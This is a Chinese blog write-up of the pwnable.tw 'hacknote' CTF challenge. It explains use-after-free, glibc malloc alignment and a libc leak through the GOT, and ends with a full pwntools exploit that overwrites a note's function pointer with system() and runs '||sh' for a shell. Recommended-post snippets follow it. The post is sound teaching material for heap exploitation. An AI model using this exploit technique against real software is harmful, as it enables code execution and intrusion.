pwnable.tw之hacknote

最新推荐文章于 2021-12-28 14:07:08 发布
最新推荐文章于 2021-12-28 14:07:08 发布
阅读量2.9k 收藏 6
点赞数
文章标签: ctf pwn uaf malloc
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35429581/article/details/78231443
版权

  uaf漏洞产生的主要原因是释放了一个堆块后,并没有将该指针置为NULL,这样导致该指针处于悬空的状态(有的地方翻译为迷途指针),同样被释放的内存如果被恶意构造数据,就有可能会被利用。

再怎么表述起始还不如真的拿一道题自己调自己看内存看堆状态来的好理解。这也是我觉得ctf-pwn的意义所在,可以把一些漏洞抽象出来以题的形式,作为学习这方面的一个抓手。

此篇尽量做的细致基础,但仍然假设读者已经初步了解uaf能够实现exploit的原理,例如malloc的内存优先分配机制。

当然作为一个小白,还是从一些比较直白漏洞利用单一一些的题目来理解uaf的利用姿势。

pwnable.kr这个网站基本满足这种单一直白,代码量不多也基本不需要多个漏洞一起搞,就是服务经常挂。上面有一道uaf的题,好像是利用c++虚函数表搞的

exploit-exercise也不错,不过后面的题目调试起来比较麻烦。

pwnable.tw比较难,可以作为进阶练习。

感觉如果想找一个题目作为开始,TU-CTF PWN  woO这道五十分的题基本没什么坑,可以作为理解用。

这次分析一下pwnable.tw的这道hacknote,相比2016湖湘的fheap而言这道题算是纯uaf利用了,做个记录也帮助进一步理解uaf的姿势><!

0x0 程序分析

丢到ida里面看下:

add note功能:

可以看到首先为ptr+note_offset 使用malloc分配了8字节的内存,分别存放函数地址0x804862b(打印content的内容)和一个指向当期那note内容content的指针。

之后会请用户输入content的size和content的内容。这里涉及到malloc分配内存时的内存对齐。

0x1 malloc内存对齐

部分摘自网络

在大多数情况下,编译器和C库透明地帮你处理对齐问题。POSIX 标明了通过malloc( ), calloc( ), 和 realloc( ) 返回的地址对于任何的C类型来说都是对齐的。这样可以避免内存中的碎片,提高程序效率。

对齐参数(MALLOC_ALIGNMENT) 大小的设定并需满足两个特性:

1)必须是2的幂

2)必须是void*的整数倍,sizeof(void*) is 4Bytes in x86 ,and  8Bytes in x64

粗粗看了下malloc的头文件定义,对齐参数MALLOC_ALIGNMENT应该为2*sizeof(void*),即32位下为8bytes,64位下为16bytes。

但是最小分配单位并不是对齐单位,同样参考glibc的malloc.h文件,最小分配单位MINSIZE:

其中MIN_CHUNK_SIZE为一个chunk结构体的大小:为16字节

计算MINSIZE=(16+8-1) & ~(8-1)=16字节

即32位下malloc的最小分配单位为16字节,64位下最小分配单位为32字节。

其中request2size就是malloc的内存对齐操作。

从request2size还可以知道,如果是64位系统,申请内存为1~24字节时,系统内存消耗32字节,当申请内存为25字节时,系统内存消耗48字节。 如果是32位系统,申请内存为1~12字节时,系统内存消耗16字节,当申请内存为13字节时,系统内存消耗24字节。(类似计算MINSIZE)

0x2 泄露libc_base地址

继续分析程序的基本流程:

add note后堆的情况:

这里新建了两个note,大小分别为20和8,ptr处存放了了两个指向note结构体的指针。

struct note{

            *p             //指向打印函数0x080462b的指针

            *content   //指向note内容的指针

}

可以看到之前介绍的malloc内存对齐机制的体现:

1.一开始malloc了8字节存放note结构体,实际上为了内存对齐分配了0x804b008~0x804b017的16字节内存空间;

2.用户设置的content大小为20字节,对齐后实际为0x804b018~0x804b02b的24字节内存空间

大体的利用思路为:

add_note首先malloc出8字节来存放note结构体,接着用户输入content的size:16,这样操作两次,分配的内存大小为16/24/16/24

接着使用delete_note来释放内存:

先后delete_note(0)  delete_note(1),接着add_note,增加一个content size=8,内容为'aaaaaaaa'

free后并没有置空指针,这样就造成了uaf利用。free过后的空表:

——————————————

| content0         32bytes            第一个note的content       |    head

——————————————                                       |

| struct note0    16bytes            第一个note的结构体         |

——————————————                                       |

|content1          32bytes            第二个note的content       |

——————————————                                       |

|struct note1      16bytes            第二个note的结构体        |

——————————————                                      V    tail

增加note的过程中需要做两次malloc(8)的操作,经过内存对齐后即为分配两个大小为16字节的内存,这样根据malloc的优先分配机制,从空表尾部开始寻找大小为16字节的空间。

因此新建的note2的strcut note将被分配到note1的结构体位置,note2的content将被分配到note0的结构体位置,note0八字节的结构体处分别存放了打印函数0x804862b和其参数地址,现在将被我们输入的content覆盖!

题目已经给出了libc文件,我们首先要做的就是泄露出libc加载到内存中的基址:

以read()为例,我们将指向content的指针覆盖为read在got表中的地址,这样调用print_note后就会打印出read的实际地址,利用:system_addr-libc_system=read_addr-libc_read

计算system_addr=read_addr-libc_read+libc_system

def leak_libc_base():
        libc=ELF('./libc_32.so.6')
        libc_read_addr=libc.symbols['read']
        libc_system_addr=libc.symbols['system']
        add(20,'a'*19)
        add(20,'b'*19)
        delete(0)
        delete(1)
        add(8,p32(0x804862b)+p32(0x804a00c))
        show(0)
        leak_read_addr=u32(p.recv(4))
        system_addr=leak_read_addr-libc_read_addr+libc_system_addr
        return system_addr

       0x3 cat flag

         泄露libc加载基址的过程实际上就是改编程序执行流程的过程,既然我们已经得到了system的实际地址,只需要重复相同的步骤,只是将原本0x804862b覆盖为system的地址。

         这里还有一个小坑,覆盖后system的参数实际上是从note0结构体开始的,也就是p32(system_addr)+'sh',这样是无法达到system('/bin/sh')的效果的,类似的题目还有sect.ctf.rocks(比赛网站已经挂了好像是叫做SEC-T CTF一个国外的比赛)里有一道pwn50也要用到system参数截断的姿势,当时用的是&&sh,类似的还有||sh,;sh; 类似的好像在web题里也有体现(???萌新表示对web一无所知)

         还有最近不知道为什么不止pwnable.kr经常挂,今天试pwnable.tw去nc的时候也gg了,暂时本地测试ok。

         附上exp:

         

from pwn import *
p=process('./hacknote')
def add(size,data):
    p.recvuntil('Your choice ')
    p.recvuntil(':')
    p.sendline('1')     
    p.recvuntil('Note size ')
    p.recvuntil(':')
    p.sendline(str(size))
    p.recvuntil('Content ')
    p.recvuntil(':')
    p.sendline(data)

def delete(index):
    p.recvuntil('Your choice ')
    p.recvuntil(':')
    p.sendline('2')
    p.recvuntil('Index ')
    p.recvuntil(':')
    p.sendline(str(index))

def show(index):
    p.recvuntil('Your choice ')
    p.recvuntil(':')
    p.sendline('3')
    p.recvuntil('Index ')
    p.recvuntil(':')
    p.sendline(str(index))
def leak_libc_base():
    libc=ELF('./libc_32.so.6')
    libc_read_addr=libc.symbols['read']
    libc_system_addr=libc.symbols['system']
    add(20,'a'19)
    add(20,'b'*19)
    delete(0)
    delete(1)
    add(8,p32(0x804862b)+p32(0x804a00c))
    show(0)
    leak_read_addr=u32(p.recv(4))
    system_addr=leak_read_addr-libc_read_addr+libc_system_addr
    return system_addr

system_addr=leak_libc_base()
print hex(system_addr)
delete(2)
add(8,p32(system_addr)+'||sh')
#gdb.attach(p,'b * 0x8048a85')
show(0)
p.interactive()






Kdongdong
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pwnable tw Death Note writeup
charlie_heng的专栏
03-01 1064
pwnable tw的题做到后面越来越骚了……脑洞太大… 这题其实是printable shellcode 一开始完全没思路,后面搜了下,发现了一个神器 https://github.com/VincentDary/PolyAsciiShellGen 能将shellcode转化为可打印字符 看了下生成的shellcode,发现其实它是利用 sub eax,xxxx 来将eax设置为任意值,...
pwnable.tw wp - hacknote
fa1c4的blog
09-21 217
前言 pwnable.tw上的hacknote, 与攻防世界的hacknote类似的题目 分析过程 add函数, 还算合理 unsigned int add() { int v0; // ebx int i; // [esp+Ch] [ebp-1Ch] int size; // [esp+10h] [ebp-18h] char buf[8]; // [esp+14h] [ebp-14h] BYREF unsigned int v5; // [esp+1Ch] [ebp-Ch] v
pwnable.tw hacknote
weixin_46521144的博客
07-14 117
hacknote 主要考察:uaf,fastbin数据结构 分析程序流程可知,在add部分,创建的数据结构如下所示 用图片直观表示,就是 所有被分配的chunk数据结构都是puts块+数据块,并且puts块大小固定。注意到每次free的时候两个快都会被free,并且存在uaf,考虑在free两个块之后,一次malloc 0x8大小的内容,再执行show,那么malloc(0x8)时候调用的puts函数即可被劫持,因为0x10大小的块全被放在了一个fastbin中,我们add一个0x8的块,会从fastbi
pwnable.tw——hacknote分析
Eagle_hwei的博客
02-24 393
hacknote的题目分析 2020-02-2421:22:47 by hawkJW 题目附件、ida文件及wp链接   这是一道比较经典的题目,所以稍微记录一下   1.  程序流程总览 首先,还是老规矩,看一下保护情况   可以看出来,PIE没有开启,可以修改got表,其余基本上都开启了,保护程度一般吧。下面我们来看一下程序的具体流程吧。 没什么好说的,还是比较经典的...
buu-pwn-heap刷题日记
abelxu
10-25 1088
一开始的题解忘记记录题解了。每天刷两道pwn题 babyfengshui_33c3_2016 https://blog.csdn.net/qinying001/article/details/104359401 漏洞点在Update函数的比较部分。将des_addr+length和Node_addr - 4进行比较。 [V&N2020 公开赛]simpleHeap https://blog.csdn.net/qq_39869547/article/details/104587504 https://
Assassins.Creed.III.TW.THETA.RIP.torrent
07-20
Assassins.Creed.III.TW.THETA.RIP.torrent3DMGAME.Assassins.Creed.III.TW.THETA.RIP.torrent3DMGAME.Assassins.Creed.III.TW.THETA.RIP.torrent3DMGAME.Assassins.Creed.III.TW.THETA.RIP.torrent3DMGAME....
rate.bot.com.tw:台湾银行黄金价格抓取程式
06-11
台湾银行黄金价格抓取程式 序 此程式以语言撰写,以日期为参数抓取台湾银行。... GET http://rate.bot.com.tw/Pages/UIP005/UIP00511.aspx?whom=GB0030001000&afterOrNot=0&curcd=TWD&date=20000101 只需变换date参数。
MP4播放器_mp4播放器_player_mp4_mp4ba.tw_
10-03
【标题】"MP4播放器_mp4播放器_player_mp4_mp4ba.tw_" 指的是一个专注于播放MP4格式视频文件的播放器。在数字媒体领域,MP4是一种广泛使用的视频编码格式,它能够有效地压缩视频数据,同时保持较高的画质。MP4播放器...
TW6.1.5.8-Enterprise-Linux
最新发布
08-31
TW6.1.5.8_Enterprise_Linux TongHttpServer(THS)是一款功能强大、稳定高效、高性价比、易于使用、便于维护的负载均衡软件产品。THS 不仅可以满足用户对负载均衡服务的需求,提升系统可靠性、高效性、可扩展性及...
28365365.tw_11个单页源码.rar
10-07
标题中的"28365365.tw_11个单页源码.rar"表明这是一个包含11个单页网站源代码的压缩文件,主要用于28365365.tw这个域名的相关网页设计。单页源码是指只有一屏或者滚动浏览到底的网页设计,这种设计通常用于简洁明了...
看雪wifi万能钥匙CTF年中赛 第四题 writeup(2)
ACdream
01-04 614
看雪CTF
pwnable.tw hacknote write up
qq_43189757的博客
09-08 234
程序分析: 程序有四个操作: 1.Add note 2.Delete note 3.Print note 4.Exit 1.Add note 在bss段中存放note的指针,每一个note 包含两个堆块,add的过程中第一个堆块的数据区的开始四字节存放调用puts的函数地址(0x804862b),随后四个字节存放后面存放content 的堆块的地址 2.Delete note 漏洞点发生在Dele...
pwnable_hacknote
z1r0的博客
12-28 331
pwnable_hacknote 查看保护 通过uaf改content指针为got,泄露出libc,接着改puts指针为system,放入;/sh\x00即可。 pwnable专题 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27791) else:
攻防世界-PWN进阶区-hacknote(pwnable.tw)
weixin_44145820的博客
03-04 590
攻防世界中这道题是pwnable.tw上面的原题,虽然在攻防世界上难度为7星,不过实际上这题不算难,只需要利用UAF就可以完成。 题目分析 题目链接:https://pan.baidu.com/s/1T-mIVLkxvyZ_7VvlBuInZQ 提取码:azyd checksec: 保护机制比前几题弱了很多 main: hacknote实现了三个功能: 1.添加(上限为5) 在新建no...
pwnable.tw_hacknote_uaf利用
Jc
07-19 439
一道大家都说入uaf比较好的例题,将自己学习的uaf的历程记录一下,来自某大佬一句励志的话 解题思路 1. 查看文件信息,安全机制 2. IDA审计 3. 分析漏洞点 4. 编写EXP 1.基本信息 安全机制 运行 IDA审计 1.add 2.del 3.print ...
hacknote 攻防世界
qq_41071646的博客
05-18 494
这个题我以前做过 只不过这次没有了后门函数 下面这个链接是我以前做的题的链接 https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/use_after_free/ 有了上次的经验 这次做的还比较顺利 思路其实差不多的 from pwn import* io=remote("111.198.29.45",52641) #io=p...
pwn hacknote
doudoudedi
10-28 367
这道题增加堆块会将printf函数的got表地址和将要打印的地址放入一个申请的堆块里面存在uaf漏洞可以先创建2个堆块然后释放申请0x8大小的堆块根据堆分配的原则我们先使用1的第一个然后使用0的第一个然后就修改了指针指向读到flag的函数即可 exp: from pwn import * p=process('./hacknote') elf=ELF('./hacknote') def debug...
HITCON-training lab 10 hacknote题解
coco的博客
11-19 697
基本信息 首先,我们通过checksec来查看程序的基本信息和开启的防护。该程序是一个32位程序,并且开启了canary和nx。 运行程序之后发现是一个菜单类型的程序。 静态分析 add note函数 首先申请了一个8字节的chunk,其指针记录在bss段上。这个8字节的内容是一个结构体 struct node { 指向print note content函数的指针 指向content的指针...
pwnable学习心得(一)
dezang2878的博客
02-17 233
前言:pwnable.kr这个学习网站是我学习pwn过程中主要肝的一个网站,因为要考研等种种原因没有办法继续肝题,写这个系列是希望对自己已经会了题进行一个总结,以及以我这种萌新的角度对题目的理解希望能帮助到各位初学者,有说的不对的地方还请多指教。 我理解的pwn是寻找服务器程序的漏洞,利用漏洞达到控制服务器的目的,在题目中体现为获取flag,因此我们需要做的事情有两件: 1.找...
net.ipv4.tcp_tw_recycle
03-16
net.ipv4.tcp_tw_recycle是 Linux 下用于重用 TIME_WAIT 状态的套接字,可以设置为 0 或 1,其中 0 表示禁用,1 表示启用。net.ipv4.tcp_tw_recycle是一个Linux内核参数,用于控制TCP连接的回收行为。如果该参数被...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值